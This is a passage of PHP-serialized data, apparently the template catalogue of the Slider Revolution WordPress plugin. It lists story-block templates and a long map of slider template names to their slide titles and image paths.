help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:458;a:25:{s:2:\"id\";s:3:\"494\";s:5:\"title\";s:13:\"Story Block 4\";s:5:\"alias\";s:13:\"story-block-4\";s:3:\"zip\";s:23:\"packs/story-block-4.zip\";s:3:\"uid\";s:32:\"85ac48e8e8231d2c38206cba4e7ebb68\";s:3:\"img\";s:24:\"story-block-4/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:459;a:25:{s:2:\"id\";s:3:\"495\";s:5:\"title\";s:15:\"Story Content 3\";s:5:\"alias\";s:15:\"story-content-3\";s:3:\"zip\";s:25:\"packs/story-content-3.zip\";s:3:\"uid\";s:32:\"82cac52f3ba79c0559fe0ad0cdf9d3b2\";s:3:\"img\";s:26:\"story-content-3/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}}s:6:\"slides\";a:448:{s:16:\"classic-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"classic-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"classic-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"classic-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"classic-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"classic-carousel/slide5.jpg\";}}s:13:\"classicslider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"classicslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"classicslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"classicslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"classicslider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"classicslider/slide5.jpg\";}}s:11:\"contenttabs\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"contenttabs/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"contenttabs/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"contenttabs/slide3.jpg\";}}s:13:\"facebook-feed\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"facebook-feed/slide1.jpg\";}}s:7:\"fashion\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"fashion/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"fashion/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"fashion/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"fashion/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"fashion/slide5.jpg\";}}s:14:\"flickr-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"flickr-gallery/slide1.jpg\";}}s:3:\"gym\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:14:\"gym/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:14:\"gym/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:14:\"gym/slide3.jpg\";}}s:18:\"highlight-carousel\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"highlight-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"highlight-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"highlight-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"highlight-carousel/slide4.jpg\";}}s:18:\"highlight-showcase\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"highlight-showcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"highlight-showcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"highlight-showcase/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"highlight-showcase/slide4.jpg\";}}s:10:\"image-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"imagehero/slide1.jpg\";}}s:13:\"insta-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"insta-gallery/slide1.jpg\";}}s:19:\"levanorestaurantbar\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"levanorestaurantbar/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"levanorestaurantbar/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"levanorestaurantbar/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"levanorestaurantbar/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:30:\"levanorestaurantbar/slide5.jpg\";}}s:11:\"mainfeature\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"mainfeature/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"mainfeature/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"mainfeature/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"mainfeature/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:22:\"mainfeature/slide7.jpg\";}}s:17:\"media-gallery-two\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"media-gallery-two/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"media-gallery-two/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"media-gallery-two/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"media-gallery-two/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"media-gallery-two/slide6.jpg\";}}s:23:\"media-carousel-autoplay\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide6.jpg\";}}s:21:\"news-background-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"news-bg-video/slide1.jpg\";}}s:12:\"news-gallery\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"news-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"news-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"news-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"news-gallery/slide4.jpg\";}}s:23:\"news-gallery-post-based\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"news-gallery-post-based/slide1.jpg\";}}s:9:\"news-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"news-hero/slide1.jpg\";}}s:10:\"news-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"news-video/slide1.jpg\";}}s:15:\"newsletter-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"newsletter-hero/slide1.jpg\";}}s:10:\"notgeneric\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"notgeneric/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"notgeneric/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"notgeneric/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:21:\"notgeneric/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:21:\"notgeneric/slide5.jpg\";}}s:11:\"photography\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"photography/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"photography/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"photography/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"photography/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:22:\"photography/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:22:\"photography/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:22:\"photography/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:22:\"photography/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:22:\"photography/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:23:\"photography/slide10.jpg\";}}s:20:\"photography-carousel\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"photography-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"photography-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"photography-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"photography-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"photography-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"photography-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:31:\"photography-carousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:31:\"photography-carousel/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:31:\"photography-carousel/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:32:\"photography-carousel/slide10.jpg\";}}s:16:\"search-form-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"search-form-hero/slide1.jpg\";}}s:16:\"showcasecarousel\";a:9:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"showcasecarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"showcasecarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"showcasecarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"showcasecarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"showcasecarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"showcasecarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"showcasecarousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:27:\"showcasecarousel/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:27:\"showcasecarousel/slide9.jpg\";}}s:11:\"sports-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"sportshero/slide1.jpg\";}}s:12:\"twitter-feed\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"twitter-feed/slide1.jpg\";}}s:13:\"vimeo-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"vimeo-gallery/slide1.jpg\";}}s:9:\"vimeohero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"vimeohero/slide1.jpg\";}}s:16:\"web-product-dark\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"web-product-dark/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"web-product-dark/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"web-product-dark/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"web-product-dark/slide4.jpg\";}}s:21:\"web-product-dark-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"web-product-dark-hero/slide1.jpg\";}}s:22:\"web-product-light-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"web-product-light-hero/slide1.jpg\";}}s:15:\"webproductlight\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"webproductlight/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"webproductlight/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"webproductlight/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"webproductlight/slide4.jpg\";}}s:15:\"youtube-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"youtube-gallery/slide1.jpg\";}}s:11:\"youtubehero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"youtubehero/slide1.jpg\";}}s:13:\"scroll-effect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"scrolleffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"scrolleffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"scrolleffect/slide3.jpg\";}}s:12:\"content-zoom\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"contentzoom/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"contentzoom/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"contentzoom/slide3.jpg\";}}s:13:\"food-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"foodcarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"foodcarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"foodcarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"foodcarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:23:\"foodcarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:23:\"foodcarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:23:\"foodcarousel/slide7.jpg\";}}s:14:\"rotating-words\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rotatingwords/slide1.jpg\";}}s:22:\"travel-static-captions\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"travel-static-captions/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"travel-static-captions/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"travel-static-captions/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:33:\"travel-static-captions/slide4.jpg\";}}s:7:\"concept\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"concept/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"concept/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"concept/slide3.jpg\";}}s:17:\"fullscreen-button\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"fullscreen-button/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"fullscreen-button/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"fullscreen-button/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"fullscreen-button/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"fullscreen-button/slide5.jpg\";}}s:15:\"creativefreedom\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"creativefreedom/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"creativefreedom/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"creativefreedom/slide3.jpg\";}}s:13:\"parallaxscene\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"parallaxscene/slide1.jpg\";}}s:15:\"slidingoverlays\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"slidingoverlays/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"slidingoverlays/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"slidingoverlays/slide3.jpg\";}}s:25:\"web-product-light-hero-3d\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"web-product-light-hero-3d/slide1.jpg\";}}s:6:\"woobig\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"woobig/slide1.jpg\";}}s:16:\"woocommercesmall\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"woocommercesmall/slide1.jpg\";}}s:10:\"finedining\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"finedining/slide1.jpg\";}}s:12:\"agency-intro\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"agency-intro/slide1.jpg\";}}s:7:\"ourteam\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"ourteam/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"ourteam/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"ourteam/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"ourteam/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"ourteam/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:18:\"ourteam/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:18:\"ourteam/slide7.jpg\";}}s:17:\"our-team-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"ourteamcarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"ourteamcarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"ourteamcarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"ourteamcarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"ourteamcarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"ourteamcarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:26:\"ourteamcarousel/slide7.jpg\";}}s:13:\"betteryoutube\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"betteryoutube/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"betteryoutube/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"betteryoutube/slide3.jpg\";}}s:19:\"agencywebsiteheader\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"agencywebsiteheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"agencywebsiteheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"agencywebsiteheader/slide3.jpg\";}}s:10:\"comingsoon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"comingsoon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"comingsoon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"comingsoon/slide3.jpg\";}}s:9:\"snowscene\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"snowscene/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"snowscene/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"snowscene/slide3.jpg\";}}s:8:\"rockband\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:19:\"rockband/slide1.jpg\";}}s:16:\"sleeklandingpage\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"sleeklandingpage/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"sleeklandingpage/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"sleeklandingpage/slide3.jpg\";}}s:14:\"applandingpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"applandingpage/slide1.jpg\";}}s:9:\"deskscene\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"deskscene/slide1.jpg\";}}s:15:\"cleannewsslider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"cleannewsslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"cleannewsslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"cleannewsslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"cleannewsslider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"cleannewsslider/slide5.jpg\";}}s:12:\"imagegallery\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"imagegallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 